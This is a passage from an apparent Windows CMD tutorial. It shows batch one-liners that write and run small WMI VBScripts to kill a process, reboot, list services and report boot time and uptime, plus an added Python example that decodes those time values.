@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs

To terminate the process with PID 123, use: cscript pk.vbs 123

If a 0 is displayed, termination succeeded.

Then: del pk.vbs
4. Restart the system

@echo for each os in getobject _>rb.vbs
@echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs
5. List automatically started services

@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
@echo if sc.startmode="Auto" then wscript.echo sc.name ^& " " ^& sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
6. List running services

@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
@echo if sc.state="Running" then wscript.echo sc.name ^& " " ^& sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

7. Last boot time

@echo for each os in getobject _>bt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>bt.vbs
@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs

The result is displayed in the format yyyymmddHHMMSS.mmmmmm+UUU, that is: year, month, day, hour, minute, second, microsecond and time-zone offset.
8. Display the system uptime

@echo for each os in getobject _>rt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system").instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
@echo t=t ^& mid(s,i,1):d=t\86400:r=r ^& d:t=t mod 86400:next >>rt.vbs
@echo wscript.echo cint(r) ^& "d " ^& t\3600 ^& "h " ^& t\60 mod 60 ^& "m " ^& t mod 60 ^& "s":next >>rt.vbs
cscript //nologo rt.vbs & del rt.vbs

The uptime is computed from a 64-bit performance-counter value, so it does not wrap around after 49.7 days.
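The two time values printed by scripts 7 and 8 are easier to work with once decoded. The following Python script is an added example, not part of the original article: it parses the DMTF datetime string that LastBootUpTime returns (yyyymmddHHMMSS.mmmmmm+UUU, with UUU the offset from UTC in minutes), converts a Timestamp_Sys100ns tick count to days/hours/minutes/seconds as the VBS above does, and shows what a 32-bit millisecond counter would report for the same uptime. The sample values are constructed.

```python
"""Decode the two WMI time values the scripts above print.

Added example, not part of the original article. Win32_OperatingSystem.
LastBootUpTime is a DMTF datetime string, yyyymmddHHMMSS.mmmmmm+UUU, where
UUU is the offset from UTC in minutes; Win32_PerfRawData_PerfOS_System.
Timestamp_Sys100ns is a 64-bit count of 100-nanosecond ticks since boot.
The sample values are constructed.
"""
from datetime import datetime, timedelta, timezone

TICKS_PER_SECOND = 10_000_000           # 100 ns per tick


def parse_wmi_datetime(value):
    """'20041031083015.500000+480' -> timezone-aware datetime (UTC+8)."""
    if len(value) != 25 or value[14] != "." or value[21] not in "+-":
        raise ValueError(f"not a DMTF datetime: {value!r}")
    naive = datetime.strptime(value[:21], "%Y%m%d%H%M%S.%f")
    offset = timedelta(minutes=int(value[21:]))   # '+480' -> 8 hours east of UTC
    return naive.replace(tzinfo=timezone(offset))


def uptime_from_100ns(ticks):
    """Split a 100 ns tick count into (days, hours, minutes, seconds).

    The VBS above does the division digit by digit because VBScript has no
    64-bit integer; Python integers are unbounded, so plain arithmetic works.
    """
    total_seconds = ticks // TICKS_PER_SECOND
    days, rest = divmod(total_seconds, 86400)
    hours, rest = divmod(rest, 3600)
    minutes, seconds = divmod(rest, 60)
    return days, hours, minutes, seconds


def format_uptime(ticks):
    """Same layout as the rt.vbs output: '60d 1h 1m 1s'."""
    d, h, m, s = uptime_from_100ns(ticks)
    return f"{d}d {h}h {m}m {s}s"


def uptime_seconds_32bit_ms(ticks):
    """The uptime, in seconds, a 32-bit millisecond counter would report.

    Such a counter wraps every 2**32 ms (about 49.7 days), which is the
    limitation the text says the 64-bit performance counter avoids.
    """
    return (ticks // 10_000) % 2**32 // 1000


if __name__ == "__main__":
    boot = parse_wmi_datetime("20041031083015.500000+480")   # constructed value
    print("last boot:", boot.isoformat(), "=", boot.astimezone(timezone.utc).isoformat())
    sixty_days = (60 * 86400 + 3661) * TICKS_PER_SECOND      # constructed value
    print("uptime:", format_uptime(sixty_days))
    print("a 32-bit ms counter would say:", uptime_seconds_32bit_ms(sixty_days), "s")
```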
The skills of using the CMD shell run deep. This article has only listed some general techniques; I hope they are helpful to you.

Perhaps you already know these methods, or perhaps you have better ones. I hope you will write them up and share them.